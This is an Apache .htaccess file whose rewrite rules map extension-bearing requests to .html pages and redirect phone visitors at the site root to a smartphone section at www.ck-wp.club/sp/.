RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !\.(css|js|jpg|jpeg|gif|png|xml)$ [NC]
RewriteRule ^(.+)\.(.+)$ $1\.html

RewriteEngine On  
RewriteCond %{REQUEST_URI} !^smp.*$  
RewriteCond %{HTTP_USER_AGENT} (iPhone|iPod|Android|BlackBerry|Windows.Phone) [NC]  

RewriteCond %{HTTP_USER_AGENT} !iPad [NC]  
RewriteRule ^$ https:\/\/www.ck-wp.club/sp\/ [R=301,L]  
